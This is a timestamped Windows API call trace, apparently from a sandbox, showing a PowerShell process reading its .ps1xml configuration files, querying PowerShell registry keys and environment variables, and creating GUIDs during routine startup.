	[0783.916] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0783.916] GetFileType (hFile=0x2fc) returned 0x1
	[0783.916] SetErrorMode (uMode=0x1) returned 0x1
	[0783.916] GetFileType (hFile=0x2fc) returned 0x1
	[0783.916] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.917] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.917] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.918] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.918] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.918] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.918] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.919] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.919] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.923] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.923] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.924] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.924] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.924] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.925] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.925] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.925] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.931] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.932] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.933] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.933] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.934] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.934] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.731] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.731] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.732] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.732] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.732] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.733] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.733] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.733] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.734] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.734] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.739] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.739] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.739] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.740] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.740] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.740] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.741] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.741] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0784.741] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x1b4, lpOverlapped=0x0) returned 1
	[0784.742] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d60e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2d60e08*, lpNumberOfBytesRead=0x14d408*=0x0, lpOverlapped=0x0) returned 1
	[0784.742] CloseHandle (hObject=0x2fc) returned 1
	[0784.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0784.742] SetErrorMode (uMode=0x1) returned 0x1
	[0784.742] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d380 | out: lpFileInformation=0x14d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0784.742] SetErrorMode (uMode=0x1) returned 0x1
	[0784.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0784.743] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d468 | out: phkResult=0x14d468*=0x2fc) returned 0x0
	[0784.743] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d3ec, lpData=0x0, lpcbData=0x14d3e8*=0x0 | out: lpType=0x14d3ec*=0x1, lpData=0x0, lpcbData=0x14d3e8*=0x56) returned 0x0
	[0784.743] CoTaskMemAlloc (cb=0x5a) returned 0x1ba3a620
	[0784.743] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d3bc, lpData=0x1ba3a620, lpcbData=0x14d3b8*=0x56 | out: lpType=0x14d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d3b8*=0x56) returned 0x0
	[0784.743] CoTaskMemFree (pv=0x1ba3a620) 
	[0784.743] RegCloseKey (hKey=0x2fc) returned 0x0
	[0784.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0784.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0789.822] VirtualQuery (in: lpAddress=0x14c150, lpBuffer=0x14d010, dwLength=0x30 | out: lpBuffer=0x14d010*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0789.836] VirtualQuery (in: lpAddress=0x14c150, lpBuffer=0x14d010, dwLength=0x30 | out: lpBuffer=0x14d010*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0789.836] VirtualQuery (in: lpAddress=0x14c150, lpBuffer=0x14d010, dwLength=0x30 | out: lpBuffer=0x14d010*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0792.638] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0792.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.639] CoTaskMemFree (pv=0x24c0e0) 
	[0792.656] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d608 | out: phkResult=0x14d608*=0x2f4) returned 0x0
	[0792.657] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d61c, lpData=0x0, lpcbData=0x14d618*=0x0 | out: lpType=0x14d61c*=0x1, lpData=0x0, lpcbData=0x14d618*=0x74) returned 0x0
	[0792.657] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d58c, lpData=0x0, lpcbData=0x14d588*=0x0 | out: lpType=0x14d58c*=0x1, lpData=0x0, lpcbData=0x14d588*=0x74) returned 0x0
	[0792.657] CoTaskMemAlloc (cb=0x78) returned 0x1d0a60
	[0792.657] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d55c, lpData=0x1d0a60, lpcbData=0x14d558*=0x74 | out: lpType=0x14d55c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d558*=0x74) returned 0x0
	[0792.657] CoTaskMemFree (pv=0x1d0a60) 
	[0792.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0792.657] SetErrorMode (uMode=0x1) returned 0x1
	[0792.657] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d4e0 | out: lpFileInformation=0x14d4e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0792.657] SetErrorMode (uMode=0x1) returned 0x1
	[0792.658] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0792.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.658] CoTaskMemFree (pv=0x24c0e0) 
	[0792.660] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0792.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.661] CoTaskMemFree (pv=0x24c0e0) 
	[0792.661] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0792.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.661] CoTaskMemFree (pv=0x24c0e0) 
	[0792.661] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0792.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.662] CoTaskMemFree (pv=0x24c0e0) 
	[0792.662] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0792.662] GetFileType (hFile=0x2fc) returned 0x1
	[0792.662] SetErrorMode (uMode=0x1) returned 0x1
	[0792.662] GetFileType (hFile=0x2fc) returned 0x1
	[0792.663] ReadFile (in: hFile=0x2fc, lpBuffer=0x3408900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3408900*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0792.664] ReadFile (in: hFile=0x2fc, lpBuffer=0x3408900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3408900*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0793.682] ReadFile (in: hFile=0x2fc, lpBuffer=0x3408900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3408900*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0793.683] ReadFile (in: hFile=0x2fc, lpBuffer=0x3408900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3408900*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0793.683] ReadFile (in: hFile=0x2fc, lpBuffer=0x3408900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3408900*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0793.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x3408900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3408900*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0793.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x3408900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3408900*, lpNumberOfBytesRead=0x14d178*=0x9e2, lpOverlapped=0x0) returned 1
	[0793.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x3407e4a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3407e4a*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0793.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x3408900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3408900*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0793.684] CloseHandle (hObject=0x2fc) returned 1
	[0793.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0793.685] SetErrorMode (uMode=0x1) returned 0x1
	[0793.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d120 | out: lpFileInformation=0x14d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0793.685] SetErrorMode (uMode=0x1) returned 0x1
	[0793.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0793.685] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x2fc) returned 0x0
	[0793.685] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d18c, lpData=0x0, lpcbData=0x14d188*=0x0 | out: lpType=0x14d18c*=0x1, lpData=0x0, lpcbData=0x14d188*=0x56) returned 0x0
	[0793.686] CoTaskMemAlloc (cb=0x5a) returned 0x1ba3a620
	[0793.686] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d15c, lpData=0x1ba3a620, lpcbData=0x14d158*=0x56 | out: lpType=0x14d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d158*=0x56) returned 0x0
	[0793.686] CoTaskMemFree (pv=0x1ba3a620) 
	[0793.686] RegCloseKey (hKey=0x2fc) returned 0x0
	[0793.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0793.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0793.690] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x92ec4cc0, Data2=0x6fad, Data3=0x41c0, Data4=([0]=0x95, [1]=0xe4, [2]=0xa0, [3]=0x61, [4]=0x7c, [5]=0xb1, [6]=0x7a, [7]=0x8c))) returned 0x0
	[0793.696] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x79685c9b, Data2=0xfeb6, Data3=0x436e, Data4=([0]=0x9b, [1]=0xd1, [2]=0xc2, [3]=0x2e, [4]=0xbe, [5]=0x3, [6]=0x3c, [7]=0x3f))) returned 0x0
	[0793.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0793.700] SetErrorMode (uMode=0x1) returned 0x1
	[0793.700] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0793.701] GetFileType (hFile=0x2fc) returned 0x1
	[0793.701] SetErrorMode (uMode=0x1) returned 0x1
	[0793.701] GetFileType (hFile=0x2fc) returned 0x1
